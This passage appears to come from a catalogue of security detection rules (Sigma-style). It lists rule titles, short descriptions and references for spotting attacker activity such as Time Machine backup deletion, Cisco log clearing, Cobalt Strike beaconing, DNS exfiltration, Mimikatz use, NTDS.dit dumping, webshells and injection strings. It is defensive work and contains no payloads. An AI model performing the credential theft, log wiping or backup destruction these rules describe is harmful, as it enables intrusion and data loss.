https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md |
System Shutdown/Reboot - MacOs |
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md |
Potential Base64 Decoded From Images |
Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
|
https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior, https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior |
Time Machine Backup Deletion Attempt Via Tmutil - MacOS |
Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
Time Machine Backup Disabled Via Tmutil - MacOS |
Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
An attacker can use this to prevent backups from occurring.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
New File Exclusion Added To Time Machine Via Tmutil - MacOS |
Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
Potential WizardUpdate Malware Infection |
Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset, https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/ |
Gatekeeper Bypass via Xattr |
Detects macOS Gatekeeper bypass via xattr utility |
https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md, https://www.loobins.io/binaries/xattr/ |
Potential XCSSET Malware Infection |
Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset |
Cisco Clear Logs |
Clear command history in network OS which is used for defense evasion |
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html, https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609 |
Cisco Collect Data |
Collect pertinent data from the configuration files |
https://blog.router-switch.com/2013/11/show-running-config/, https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm, https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html |
Cisco Crypto Commands |
Show when private keys are being exported from the device, or when new certificates are installed |
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html |
Cisco Disabling Logging |
Turn off logging locally or remote |
https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf |
Cisco Discovery |
Find information about network devices that is not stored in config files |
https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html |
Cisco Denial of Service |
Detect a system being shutdown or put into different boot mode |
None |
Cisco File Deletion |
See what files are being deleted from flash file systems |
None |
Cisco Show Commands Input |
See what commands are being input into the device by other people, full credentials can be in the history |
None |
Cisco Local Accounts |
Find local accounts being created or modified as well as remote authentication configurations |
None |
Cisco Modify Configuration |
Modifications to a config that will serve an adversary's impacts or persistence |
None |
Cisco Stage Data |
Various protocols maybe used to put data on the device for exfil or infil |
None |
Cisco Sniffing |
Show when a monitor or a span/rspan is setup or modified |
None |
Cisco BGP Authentication Failures |
Detects BGP failures which may be indicative of brute force attacks to manipulate routing |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
Cisco LDP Authentication Failures |
Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
DNS Query to External Service Interaction Domains |
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE |
https://twitter.com/breakersall/status/1533493587828260866 |
Cobalt Strike DNS Beaconing |
Detects suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
Monero Crypto Coin Mining Pool Lookup |
Detects suspicious DNS queries to Monero mining pools |
https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ |
Suspicious DNS Query with B64 Encoded String |
Detects suspicious DNS queries using base64 encoding |
https://github.com/krmaxwell/dns-exfiltration |
Telegram Bot API Request |
Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind |
https://core.telegram.org/bots/faq, https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ |
DNS TXT Answer with Possible Execution Strings |
Detects strings used in command execution in DNS TXT Answer |
https://twitter.com/stvemillertime/status/1024707932447854592, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1 |
Wannacry Killswitch Domain |
Detects wannacry killswitch domain dns queries |
https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign |
Cleartext Protocol Usage |
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.
Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Huawei BGP Authentication Failures |
Detects BGP failures which may be indicative of brute force attacks to manipulate routing. |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
Juniper BGP Missing MD5 |
Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing. |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
MITRE BZAR Indicators for Execution |
Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE |
https://github.com/mitre-attack/bzar#indicators-for-attck-execution |
MITRE BZAR Indicators for Persistence |
Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE. |
https://github.com/mitre-attack/bzar#indicators-for-attck-persistence |
Potential PetitPotam Attack Via EFS RPC Calls |
Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.
The usage of this RPC function should be rare if ever used at all.
Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.
View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
|
https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp, https://msrc.microsoft.com/update-guide/vulnerability/ADV210003, https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf, https://threatpost.com/microsoft-petitpotam-poc/168163/ |
Possible PrintNightmare Print Driver Install |
Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).
The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
|
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29, https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://github.com/corelight/CVE-2021-1675, https://old.zeek.org/zeekweek2019/slides/bzar.pdf, https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ |
SMB Spoolss Name Piped Usage |
Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608 |
Default Cobalt Strike Certificate |
Detects the presence of default Cobalt Strike certificate in the HTTPS traffic |
https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 |
DNS Events Related To Mining Pools |
Identifies clients that may be performing DNS lookups associated with common currency mining pools. |
https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml |
New Kind of Network (NKN) Detection |
NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> |
https://github.com/nknorg/nkn-sdk-go, https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/, https://github.com/Maka8ka/NGLite |
Suspicious DNS Z Flag Bit Set |
The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).
Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.
Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.
Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.
This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
|
https://twitter.com/neu5ron/status/1346245602502443009, https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma, https://tools.ietf.org/html/rfc2929#section-2.1, https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS |
DNS TOR Proxies |
Identifies IPs performing DNS lookups associated with common Tor proxies. |
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml |
Executable from Webdav |
Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/ |
http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html, https://github.com/OTRF/detection-hackathon-apt29 |
OMIGOD HTTP No Authentication RCE |
Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.
Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).
Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://twitter.com/neu5ron/status/1438987292971053057?s=20 |
WebDav Put Request |
A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. |
https://github.com/OTRF/detection-hackathon-apt29/issues/17 |
Publicly Accessible RDP Service |
Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
|
https://attack.mitre.org/techniques/T1021/001/ |
Remote Task Creation via ATSVC Named Pipe - Zeek |
Detects remote task creation via at.exe or API interacting with ATSVC namedpipe |
https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html |
Possible Impacket SecretDump Remote Activity - Zeek |
Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml |
https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html |
First Time Seen Remote Named Pipe - Zeek |
This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes |
https://twitter.com/menasec1/status/1104489274387451904 |
Suspicious PsExec Execution - Zeek |
detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Suspicious Access to Sensitive File Extensions - Zeek |
Detects known sensitive file extensions via Zeek |
Internal Research |
Transferring Files with Credential Data via Network Shares - Zeek |
Transferring files with well-known filenames (sensitive files with credential data) using network shares |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Kerberos Network Traffic RC4 Ticket Encryption |
Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting |
https://adsecurity.org/?p=3458 |
Apache Segmentation Fault |
Detects a segmentation fault error message caused by a crashing apache worker process |
http://www.securityfocus.com/infocus/1633 |
Apache Threading Error |
Detects an issue in apache logs that reports threading related errors |
https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md |
Nginx Core Dump |
Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. |
https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps, https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/ |
Download from Suspicious Dyndns Hosts |
Detects download of certain file types from hosts with dynamic DNS names (selected list) |
https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats |
Windows WebDAV User Agent |
Detects WebDav DownloadCradle |
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Download From Suspicious TLD - Blacklist |
Detects download of certain file types from hosts in suspicious TLDs |
https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap, https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf, https://www.spamhaus.org/statistics/tlds/, https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ |
Download From Suspicious TLD - Whitelist |
Detects executable downloads from suspicious remote systems |
Internal Research |
F5 BIG-IP iControl Rest API Command Execution - Proxy |
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP |
https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 |
HackTool - CobaltStrike Malleable Profile Patterns - Proxy |
Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods). |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile, https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile |
HackTool - BabyShark Agent Default URL Pattern |
Detects Baby Shark C2 Framework default communication patterns |
https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845 |
HackTool - Empire UserAgent URI Combo |
Detects user agent and URI paths used by empire agents |
https://github.com/BC-SECURITY/Empire |
PUA - Advanced IP/Port Scanner Update Check |
Detect the update check performed by Advanced IP/Port Scanner utilities. |
https://www.advanced-ip-scanner.com/, https://www.advanced-port-scanner.com/ |
PwnDrp Access |
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity |
https://breakdev.org/pwndrop/ |
Raw Paste Service Access |
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form |
https://www.virustotal.com/gui/domain/paste.ee/relations |
Flash Player Update from Suspicious Location |
Detects a flashplayer update from an unofficial location |
https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb |
Suspicious Network Communication With IPFS |
Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages. |
https://blog.talosintelligence.com/ipfs-abuse/, https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11, https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638 |
Telegram API Access |
Detects suspicious requests to Telegram API without the usual Telegram User-Agent |
https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ |
APT User Agent |
Detects suspicious user agent strings used in APT malware in proxy logs |
Internal Research |
Suspicious Base64 Encoded User-Agent |
Detects suspicious encoded User-Agent strings, as seen used by some malware. |
https://deviceatlas.com/blog/list-of-user-agent-strings#desktop |
Bitsadmin to Uncommon IP Server Address |
Detects Bitsadmin connections to IP addresses instead of FQDN names |
https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027 |
Bitsadmin to Uncommon TLD |
Detects Bitsadmin connections to domains with uncommon TLDs |
https://twitter.com/jhencinski/status/1102695118455349248, https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ |
Crypto Miner User Agent |
Detects suspicious user agent strings used by crypto miners in proxy logs |
https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65, https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h |
HTTP Request With Empty User Agent |
Detects a potentially suspicious empty user agent strings in proxy log.
Could potentially indicate an uncommon request method.
|
https://twitter.com/Carlos_Perez/status/883455096645931008 |
Exploit Framework User Agent |
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs |
https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ |
Hack Tool User Agent |
Detects suspicious user agent strings user by hack tools in proxy logs |
https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb, http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules |
Malware User Agent |
Detects suspicious user agent strings used by malware in proxy logs |
http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules, http://www.botopedia.org/search?searchword=scan&searchphrase=all, https://networkraptor.blogspot.com/2015/01/user-agent-strings.html, https://perishablepress.com/blacklist/ua-2013.txt, https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents, https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q, https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large, https://twitter.com/crep1x/status/1635034100213112833 |
Windows PowerShell User Agent |
Detects Windows PowerShell Web Access |
https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest |
Rclone Activity via Proxy |
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string |
https://rclone.org/, https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone |
Suspicious User Agent |
Detects suspicious malformed user agent strings in proxy logs |
https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb |
Potential Base64 Encoded User-Agent |
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding. |
https://blogs.jpcert.or.jp/en/2022/07/yamabot.html, https://deviceatlas.com/blog/list-of-user-agent-strings#desktop |
Suspicious External WebDAV Execution |
Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
|
https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html, https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html |
F5 BIG-IP iControl Rest API Command Execution - Webserver |
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP |
https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 |
Successful IIS Shortname Fuzzing Scan |
When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~" |
https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml, https://www.exploit-db.com/exploits/19525, https://github.com/lijiejie/IIS_shortname_Scanner |
Java Payload Strings |
Detects possible Java payloads in web access logs |
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/, https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/, https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md, https://twitter.com/httpvoid0x2f/status/1532924261035384832, https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035 |
JNDIExploit Pattern |
Detects exploitation attempt using the JNDI-Exploit-Kit |
https://github.com/pimps/JNDI-Exploit-Kit, https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit |
Path Traversal Exploitation Attempts |
Detects path traversal exploitation attempts |
https://github.com/projectdiscovery/nuclei-templates, https://book.hacktricks.xyz/pentesting-web/file-inclusion |
Source Code Enumeration Detection by Keyword |
Detects source code enumeration that use GET requests by keyword searches in URL strings |
https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html, https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1 |
SQL Injection Strings In URI |
Detects potential SQL injection attempts via GET requests in access logs. |
https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/, https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/, https://brightsec.com/blog/sql-injection-payloads/, https://github.com/payloadbox/sql-injection-payload-list, https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection |
Server Side Template Injection Strings |
Detects SSTI attempts sent via GET requests in access logs |
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection, https://github.com/payloadbox/ssti-payloads |
Suspicious User-Agents Related To Recon Tools |
Detects known suspicious (default) user-agents related to scanning/recon tools |
https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb, https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst, https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92 |
Suspicious Windows Strings In URI |
Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ |
Webshell ReGeorg Detection Via Web Logs |
Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. |
https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3, https://github.com/sensepost/reGeorg |
Windows Webshell Strings |
Detects common commands used in Windows webshells |
https://bad-jubies.github.io/RCE-NOW-WHAT/, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Cross Site Scripting Strings |
Detects XSS attempts injected via GET requests in access logs |
https://github.com/payloadbox/xss-payload-list, https://portswigger.net/web-security/cross-site-scripting/contexts |
Mimikatz Use |
This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) |
https://tools.thehacker.recipes/mimikatz/modules |
Microsoft Malware Protection Engine Crash |
This rule detects a suspicious crash of the Microsoft Malware Protection Engine |
https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344 |
Potential Credential Dumping Via WER - Application |
Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55 |
Ntdsutil Abuse |
Detects potential abuse of ntdsutil to dump ntds.dit database |
https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) |
Dump Ntds.dit To Suspicious Location |
Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location |
https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) |
Audit CVE Event |
Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.
MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.
Unfortunately, that is about the only instance of CVEs being written to this log.
|
https://twitter.com/VM_vivisector/status/1217190929330655232, https://twitter.com/DidierStevens/status/1217533958096924676, https://twitter.com/FlemmingRiis/status/1217147415482060800, https://www.youtube.com/watch?v=ebmW42YYveI, https://nullsec.us/windows-event-log-audit-cve/ |
Backup Catalog Deleted |
Detects backup catalog deletions |
https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 |
Application Uninstalled |
An application has been removed. Check if it is critical. |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml, https://learn.microsoft.com/en-us/windows/win32/msi/event-logging |
Restricted Software Access By SRP |
Detects restricted access to applications by the Software Restriction Policies (SRP) policy |
https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
MSI Installation From Suspicious Locations |
Detects MSI package installation from suspicious locations |
https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html |
MSI Installation From Web |
Detects installation of a remote msi file from web. |
https://twitter.com/_st0pp3r_/status/1583922009842802689 |
Atera Agent Installation |
Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators |
https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent |
MSSQL Add Account To Sysadmin Role |
Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ |
MSSQL Disable Audit Settings |
Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server |
